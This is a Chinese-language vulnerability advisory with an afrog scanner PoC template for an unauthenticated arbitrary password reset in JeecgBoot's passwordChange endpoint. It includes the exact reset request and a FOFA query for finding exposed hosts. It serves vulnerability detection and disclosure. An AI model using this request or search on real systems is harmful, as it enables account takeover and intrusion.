jeecgboot-passwordchange-user-reset-unauth: JeecgBoot 任意用户密码重置

日期: 2025-09-01 | 影响软件: JeecgBoot | POC: 已公开

漏洞描述

JeecgBoot框架passwordChange接口存在任意用户密码重置漏洞,未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 fofa: body="/sys/common/pdf/pdfPreviewIframe"

PoC代码[已公开]

id: jeecgboot-passwordchange-user-reset-unauth

info:
  name: JeecgBoot 任意用户密码重置
  author: zan8in
  severity: high
  verified: true
  description: |-
    JeecgBoot框架passwordChange接口存在任意用户密码重置漏洞,未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
    fofa: body="/sys/common/pdf/pdfPreviewIframe"
  reference:
    - https://mp.weixin.qq.com/s/G5DiGrVbYKmftBLJ06NmQg
  tags: jeecgboot,unauth
  created: 2024/12/30

rules:
  r0:
    request:
      method: GET
      path: /novat-boot/sys/user/passwordChange?username=admin1&password=admin&smscode=&phone=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":false') &&
      response.body.bcontains(b'"message":"未找到对应实体"') &&
      response.body.bcontains(b'"code":0') &&
      response.body.bcontains(b'"result":null') &&
      response.body.bcontains(b'"timestamp":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jeecgboot-passwordchange-user-reset-unauth.yaml

相关漏洞推荐